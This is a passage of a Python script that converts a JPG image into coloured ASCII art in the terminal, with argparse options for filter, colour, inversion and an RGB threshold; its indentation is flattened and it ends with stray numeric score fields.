colorstr = Fore.BLACK
if fgcolor == 'red':
colorstr = Fore.RED
if fgcolor == 'green':
colorstr = Fore.GREEN
if fgcolor == 'yellow':
colorstr = Fore.YELLOW
if fgcolor == 'blue':
colorstr = Fore.BLUE
if fgcolor == 'magenta':
colorstr = Fore.MAGENTA
if fgcolor == 'cyan':
colorstr = Fore.CYAN
if fgcolor == 'white':
colorstr = Fore.WHITE
f = lambda x: x*3
# sorry for the cryptic print
print(*[ colorstr + ''.join([f(ascii_char) for ascii_char in row]) for row in ascii_image_matrix], sep='\n')
# return terminal to normal state
print(Style.RESET_ALL)
#for row in ascii_mat:
# for char in row:
# print(char*3, end='')
# print()
def display_rgb_ascii_image(ascii_image_matrix, pixel_matrix, threshold):
colorstr = ''
color_opts = [ Fore.RED, Fore.GREEN, Fore.BLUE ]
for char_row, pixel_row in zip(ascii_image_matrix, pixel_matrix):
for char, pixel in zip(char_row, pixel_row):
pixel = list(pixel)
max_value = max(pixel)
max_index = pixel.index(max_value)
pixel.remove(max_value)
# we check is the average of the other pixel values
# is less than some (thresholded value of max pixel_value)[threshold * max_pixel_value]
# this means the max truly dominates even after thresholding
if sum(pixel)//2 <= (threshold)*max_value:
colorstr = color_opts[max_index]
else:
colorstr = Style.RESET_ALL
print(colorstr, char*3, end='', sep='')
print()
# return terminal to normal state
print(Style.RESET_ALL)
# argument parsing helper
def restricted_float(x):
x = float(x)
if x < 0.0 or x > 1.0:
raise argparse.ArgumentTypeError("{} not in range [0.0, 1.0]".format(x))
return x
def main():
parser = argparse.ArgumentParser(description='Transform a 3 band JPG image to ascii art.')
parser.add_argument('image', help='The image to transform.')
parser.add_argument('-f', '--filter', choices=['average', 'lightness', 'luminosity'],
default='average', help='Choose the filter to use.' )
parser.add_argument('-c', '--color', choices=['black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white', 'rgb'],
default='white', help='Choose the color of the output.' )
parser.add_argument('-i', '--invert', action="store_true", help='Invert the image. Make more bright areas less bright and less, more.' )
parser.add_argument('-t', '--threshold', type=restricted_float, default=0.0,
help= 'Use this argument with color=\'rgb\' to control only hilighted pixels. Threshold is a float between 0 to 1.\nSet threshold as 1 to color with the dominating color. Default: 0.0.')
args = parser.parse_args()
# query terminal capabilities to set up max_height and max_width of the image
# if not('LINES' in os.environ or 'COLUMNS' in os.environ):
# # cannot get lines and columns, define default
# print('export LINES and COLUMNS environment variables before running this script if possible,'+
# 'or else we use predefined default values')
# columns = 680
# lines = 105
# else:
# print('Got values from env, lines:', os.environ['LINES'], ' columns:', os.environ['COLUMNS'])
# columns = int(os.environ['COLUMNS'])
# lines = int(os.environ['LINES'])
# this should work most of the time
lines, columns = map(int, subprocess.run(["stty", "size"], capture_output=True, text=True).stdout.strip().split())
im = Image.open(args.image)
print('Image successfully loaded.')
im = resize_image(im, columns, lines)
print('Image size after resize: {} x {} '.format(im.width, im.height))
# processing
im_mat = get_image_matrix(im)
intensity_mat = get_intensity_matrix(im_mat, args.filter, args.invert)
ascii_mat = get_character_matrix(intensity_mat)
if args.color == 'rgb':
display_rgb_ascii_image(ascii_mat, im_mat, args.threshold)
else:
display_ascii_image(ascii_mat, args.color)
if __name__ == '__main__':
init() # initialize colorama
main()
| 3.4375
| 3
|